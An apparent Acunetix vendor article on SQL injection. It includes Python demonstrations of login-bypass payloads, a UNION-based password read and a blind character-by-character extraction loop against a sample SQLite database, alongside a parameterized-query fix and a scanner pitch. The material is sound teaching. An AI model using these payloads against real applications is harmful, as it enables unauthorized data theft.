There’s a reason injection vulnerabilities have long sat at the top of the OWASP Top 10: SQL injection (SQLi) continues to be one of the most prevalent forms of web application attack used by malicious hackers around the world.
An SQLi needs only two conditions to exist: a user-controllable input in your web application that is placed directly into an SQL query, and an SQL-based relational database behind it. MySQL, Microsoft SQL Server, Oracle, and SQLite are all examples of popular relational database management systems (RDBMSs) in use today. Since many websites are built on content management systems like WordPress or Drupal, it’s not uncommon for a third-party theme or plugin to introduce an SQLi vulnerability. Let’s take a deep dive into the world of SQL injection attacks and how Acunetix can help you identify SQLi vulnerabilities in your web applications so you can fix them before attackers exploit them.
What is SQL Injection
SQLi is a well-documented vulnerability that has been known to the developer community since the late 1990s. Whenever you type text into a form, such as your login credentials, the web application builds an SQL statement containing your input value and sends it to the DBMS, which executes it. Your input travels from the client (such as a browser) to the web server inside an HTTP request. A typical SQLi attack involves an attacker placing malicious SQL fragments in an HTTP request so that they change the meaning of the SQL statement the web application constructs: instead of being treated as data, the input is parsed as part of the query. Fortunately, there are many testing tools available to developers looking to find such security vulnerabilities.
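To make the login-form case concrete, here is an added example (not code from the original article or from Acunetix) using Python's built-in sqlite3 module. The users table, the credentials in it and the plaintext password storage are all constructed for the example; a real application would store password hashes. The point is only how the statement is built: the vulnerable version concatenates the form fields into the SQL text, the safe version binds them as parameters.

```python
import sqlite3

# Constructed sample data for this example: a tiny in-memory users table.
# Plaintext passwords are used only to keep the example short.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users VALUES ('alice', 'correct horse'), ('bob', 'hunter2')"
    )
    return conn

def login_vulnerable(conn, username, password):
    """Builds the statement by string concatenation. Whatever was typed into
    the form becomes part of the SQL text, so a quote in the input ends the
    string literal and the rest is parsed as SQL."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Parameterized query: the driver sends the input as bound values, so it
    is compared as data and never parsed as SQL, whatever it contains."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    conn = make_db()
    # Normal use: both versions log alice in with the right password.
    print(login_vulnerable(conn, "alice", "correct horse"))  # alice
    print(login_safe(conn, "alice", "correct horse"))        # alice

    # Classic bypass: the password field closes the literal and appends
    # OR '1'='1', which is true for every row, so the first user is returned.
    payload = "' OR '1'='1"
    print(login_vulnerable(conn, "nobody", payload))  # alice (bypass)
    print(login_safe(conn, "nobody", payload))        # None

    # Targeted bypass: a comment marker in the username discards the
    # password check entirely.
    print(login_vulnerable(conn, "bob'-- ", "wrong"))  # bob (bypass)
    print(login_safe(conn, "bob'-- ", "wrong"))        # None
```

The two payloads shown are the ones a scanner or a manual tester tries first; the parameterized version returns None for both because the whole string, quote and comment marker included, is compared against the stored username or password column.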
Types of SQL Injection Techniques
Hackers have devised myriad ways to exploit SQL injection vulnerabilities. The three main types of SQL injection are:
- In-band SQLi (Classic SQLi) is the simplest and most common: the attacker injects the payload and reads the result over the same HTTP request/response channel. Error-based SQLi (data leaks through database error messages) and Union-based SQLi (a UNION SELECT appends the attacker's chosen data to the legitimate result set) both fall into this category.
- Blind SQLi (Inferential SQLi) is the slow and steady approach. The application returns neither query results nor error text, so the attacker sends payloads and observes only the application's behavior, such as whether the page content changes (boolean-based) or how long the response takes (time-based), to reconstruct the database structure and contents one yes/no answer at a time.
- Out-of-band SQLi is the least common. The payload makes the DBMS use one of its own features, such as issuing DNS or HTTP requests, to send data to a server controlled by the attacker. Its advantage is that it can be used when server responses are too unstable for a blind SQLi.
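The following added example (not code from the original article or from Acunetix) walks through the first two categories against a constructed SQLite database: a product lookup whose id is concatenated into the query. The products and users tables and their contents are made up for the example. The union-based variant reads the hidden value straight out of the response; the boolean-based blind variant gets only a found/not-found signal and reconstructs the same value character by character. Out-of-band SQLi is not shown because it relies on DBMS features, such as making network requests, that SQLite does not have.

```python
import sqlite3
import string

# Constructed sample data: a catalogue the app exposes and a table it does not.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO products VALUES (1, 'widget'), (2, 'gadget')")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn

def product_name(conn, product_id):
    """Vulnerable: the id from the URL is concatenated into the query and the
    query result is echoed to the page, so whatever the attacker SELECTs is
    displayed in-band."""
    sql = "SELECT name FROM products WHERE id = " + product_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def product_exists(conn, product_id):
    """Same flaw, but this page only reveals whether a row matched (blind)."""
    return product_name(conn, product_id) is not None

def union_attack(conn):
    # In-band, union-based: id 0 matches nothing, and the appended SELECT has
    # the same column count, so its value is returned in place of a product name.
    payload = "0 UNION SELECT password FROM users WHERE username = 'alice'"
    return product_name(conn, payload)

def blind_extract(conn, max_len=32):
    # Inferential, boolean-based: product 1 exists, so the page says "found"
    # only when the appended condition is also true. One request per guess.
    alphabet = string.ascii_letters + string.digits + "_"
    recovered = ""
    requests = 0
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = (
                "1 AND substr((SELECT password FROM users WHERE username = 'alice'), "
                + str(pos) + ", 1) = '" + ch + "'"
            )
            requests += 1
            if product_exists(conn, probe):
                recovered += ch
                break
        else:
            break  # no character matched at this position: end of the value
    return recovered, requests

if __name__ == "__main__":
    conn = make_db()
    print(product_name(conn, "1"))       # widget (normal use)
    print(union_attack(conn))            # s3cret, read directly from the page
    value, n = blind_extract(conn)
    print(value, "recovered in", n, "requests")  # s3cret, well over 100 requests
```

The request count is the practical difference between the two classes: the union attack needs one request, while the blind attack needs one request per candidate character per position, which is why blind SQLi is slow and why scanners sample a few positions rather than dumping whole tables.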
Test your Web App for SQL Injection with Acunetix
The best way to secure your digital assets from SQLi is to find and fix web application vulnerabilities before they can be exploited. Looking for a powerful scanner that can help you identify security vulnerabilities for your team to fix? Try the Acunetix Vulnerability Scanner today to look for SQL injection, Cross-site Scripting (XSS), and other security vulnerabilities.
“We use Acunetix as part of our Security in the SDLC and to test code in DEV and SIT before being promoted to Production.”
Kurt Zanzi, Xerox CA-MMIS Information Security Office, Xerox